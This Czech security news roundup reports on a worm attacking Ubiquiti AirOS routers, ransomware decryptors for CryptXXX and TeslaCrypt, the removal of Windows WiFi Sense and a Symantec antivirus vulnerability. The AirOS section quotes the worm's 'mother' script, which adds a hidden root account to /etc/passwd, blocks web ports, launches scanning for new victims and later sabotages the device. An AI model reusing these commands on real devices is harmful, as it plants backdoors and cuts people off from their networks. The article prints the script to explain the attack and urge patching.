Pokud k šíření bezdrátové sítě používáte zařízení Ubiquity a v poslední době jste neaktualizovali AirOS, máte velké štěstí v případě, že vám vše funguje tak jak má. V minulém týdnu se rapidně rozšířil červ zneužívající zranitelnost v AirOS, která umožňuje útočníkovi nahrát vlastní soubor do souborového systému zařízení, aniž by znal přihlašovací údaje. Konkrétně se problém týká zařízení airMAX M, airMAX AC, ToughSwitch, airGateway and airFiber. V pondělí byla vydána oprava v rámci nového firmware 5.6.5 a o problému informoval jak výrobce na svém fóru, tak velký český distributor této značky, společnost i4wifi.

Jedno z náchylných zařízení – Ubiquity airFiber

Tyto zařízení používají zejména poskytovatelé internetu, univerzity, hotely a další firemní zákazníci. A právě ti se v minulém týdnu často stali obětí červa. Ten se činil v Argentině, Brazílii, Španělsku, Spojených státech, ale také u nás v ČR. Útokem na několik poskytovatelů v Česku odřízl tisíce lidí od internetu na dobu, než správci zařízení vyčistili, aktualizovali a znovu nastavili.

K napadení vir potřeboval jen to, aby se k zařízení dalo přistupovat přes HTTP nebo HTTPS. Přes jeden z protokolů do zařízení nahrál svůj veřejný SSH klíč a sám sebe. Poté se přes SSH na zařízení přihlásí, rozbalí své soubory, zapíše se do perzistentní paměti a zařízení restartuje. Poté spustí skript pojmenovaný mother, jehož obsah můžete vidět níže.

cat mother
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
iptables -I INPUT -p tcp --dport 80 -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport 443 -j DROP 2>/dev/null
cp $per/mf.tar $per/.mf/
(sleep 90 ; $per/.mf/download )&
(sleep 70 ; sleep 50 ; sleep 30 ; $per/.mf/search 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 35 ; $per/.mf/search 7 15 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 45 ; $per/.mf/search 0 64 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 55 ; $per/.mf/search 25 16 2>/dev/null >/dev/null )&
(sleep 66666 ; $per/.mf/f u c k e r 2>/dev/null >/dev/null )&
(sleep 666666 ; sed -i 's/wireless.1.ssid=.*/wireless.1.ssid=motherf u c k e r/' /tmp/system.cfg ; sed -i 's/radio.1.mode=.*/radio.1.mode=Master/' /tmp/system.cfg ; cfgmtd -f /tmp/system.cfg -w ; sleep 15 ; poweroff ) &

Skript na firewallu zablokuje porty 80 a 443, postahuje potřebné nástroje a poté spustí skenování adresního prostoru s cílem najít a infikovat další zařízení. U těch si ukládá IP adresu a po 66 666 sekundách se je přes webové rozhraní pokusí resetovat do továrního nastavení (to se povede pouze u neúspěšně infikovaných). Mimo to na prvotně infikovaném zařízení se spustí i další odpočet. Ten čeká 666 666 sekund, po kterých se SSID bezdrátové sítě přenastaví na „motherf u c k e r“ a následně se zařízení vypne.

Pokud takto nechcete dopadnout, aktualizujte na firmware 5.6.5. Pokud jste takto již dopadli, je dostupný nástroj pro odstranění viru včetně návodu na jeho použití na stránkách i4wifi.

Kaspersky vám může pomoci i proti CryptXXX ransomwaru

Ransomware kybernetickým zločincům pěkně vydělává a tak není divu, že počty jeho výskytů neustále rostou. Před několika týdny se objevila nová varianta jménem CryptXXX, která na uživatele čekala na mnoha infikovaných stránkách. CryptXXX šifroval jak lokální soubory, tak data na připojených médiích. Dokonce také kradl z počítačů svých oběti Bitcoiny. K informacím o tom, jak dostat své soubory zpět, museli uživatelé instalovat prohlížeč TOR a následně se dostali k návodu, který vidíte níže.

Návod pro platbu za dešifrování souborů napadených CryptXXX

Od dubna vedli proti CryptXXX boj výzkumníci společnosti Kaspersky. Nejprve rozšířili existující nástroj RannohDecryptor tak, že dokázal zašifrovaná data obnovit. Nelenili ale ani útočníci a před pár týdny začali šířit aktualizovanou verzi ransomwaru, na kterou byli u Kaspersky opět krátcí. Ne však na dlouho – v minulém týdnu uvolnili nástroj RannohDecryptor ve verzi 1.9.1.0, která si poradí i s druhou verzí ransomwaru CryptXXX a uživatelé tedy nemusí za vrácení svých dat platit.

„Projekt“ TeslaCrypt skončil a klíče byly zveřejněny

S dalším tématem nebudeme chodit daleko, přesuneme se jen k jinému ransomwaru a k jiné antivirové společnosti. Tentokrát se podíváme na boj společnosti ESET proti ransomwaru TeslaCrypt. Ten se objevil přibližně před rokem a od té doby se vyvíjel a opravoval své chyby. Ve verzi 2.0 se bezpečnostním analytikům podařilo najít chybu a zachraňovat soubory, nicméně verze 3.0 ji opravila a uživatelé museli za dekódování opět platit.

Hlavní klíč, díky kterému je možné dešifrovat data obětí TeslaCryptu

Nyní se ale, jak uvádí zpráva společnosti ESET, tvůrci TeslaCryptu rozhodli s "projektem" skončit. Po tomto oznámení jeden z analytiků ESETu poslal anonymní žádost přes kontaktní kanál pro oběti tohoto ransomwaru a žádal o master klíč pro dešifrování dat. A neuvěřitelné se stalo skutkem, klíč byl zveřejněn.

Děšifrovací nástroj od společnosti ESET

Díky tomuto klíči mohla společnost ESET vytvořit nástroj pro dešifrování, který si na jejich webu můžete zdarma stáhnout. Na zveřejnění klíče zareagovali i další tvůrci dešifrovacích nástrojů a své programy aktualizovali. Například na webu bleepingcomputer.com můžete najít odkaz na TeslaDecoder včetně detailního návodu k použití.

Microsoft nenápadně odstranil kontroverzní sdílení WiFi

Již od samotného představení funkcionality WiFi Sense se o ní pochybovalo a snášela se na ní spíš kritika. Usadila se na prvních příčkách žebříčků zaměřujících se na to, co je potřeba vypnout po instalaci Windows 10. Nyní se tato pochybná funkcionality z našich systémů vytratí. Pro nezasvědcené je třeba uvést, že se jednalo o jednoduché sdílení hesel k WiFi sítím s vašimi přátely. Alespoň podle Microsoftu.

Checkbox potvrzující možnost sdílet přístup k síti s přátely

Při oznámení nového buildu(14342) připravované výroční edice Windows 10 uvedl Gabe Aul, že cena aktualizování kódu funkcionality WiFi Sense je neúměrná jejímu nízkému využití a zájmu o ní. Nevidí tudíž důvod, aby dále existovala. Na vydání výroční aktualizace se můžeme těšit v červnu až v červenci tohoto roku.

V jádru antiviru od Symantecu se skrývala kritická zranitelnost

Hacker Tavis Ormandy z GoogleProject Zero objevil kritickou zranitelnost CVE-2016-2208 v antivirovém systému Symantec. Zranitelnost spočívá ve zneužitelném přetečení paměti v jádru antiviru, tedy v části, která se používá ve většině řešení od společností Norton a Symantec. K přetečení paměti může dojít při parsování spustitelného souboru zabaleného starší verzá nástroje Aspack. K provedení útoku stačí oběti poslat škodlivý soubor emailem, nebo mu na něj poslat odkaz.

Následek chyby v antivirovém softwaru Symantec

Zranitelnost postihuje nástroje pro všechny systémy. U operačního systému Windows bude výsledkem chyby pád systému a stará známá modrá obrazovka, jelikož jádro antiviru je načteno v kernelu systému. Na systémech Linux, Mac a UNIX dojde k vzdálenému přetečení paměti haldy u procesu daného programu. Ormandy se dokonce podělil o PoC kód.

Komix znázorňující převratnost nápadu práce s testovaným souborem na OS Windows

Opravy produktů společnosti Symantec budou postupné. Některé případy jsou jednoduché a budou distribuovány automatickou aktualizací, u některých produktů ale bude oprava trvat déle z důvodů důkladného testování a komplexnejší přípravy patchů.

Další zprávy ze světa IT bezpečnosti v bodech:

• V posledním čtvrtletí 2016 v Chromu ustoupí Flash před HTML5
• Výzkumníci odhalili útok zneužívající nedávno opravenou chybu ve Flashi
• Apple opravil možnost obejít zamčenou obrazovku
• 5 bitcoinů za 117 miliónů přihlašovacích údajů na LinkedIn
• Průlom v generátorech náhodných čísel může vylepšit šifrování
• Cisco vydalo sérii oprav řešících závažné DoS zranitelnosti
• John McAffe tvrdí, že se svým týmem prolomil zabezpečení zpráv WhatsApp
• Návštěvníky internetových stránek je možné sledovat podle audio otisku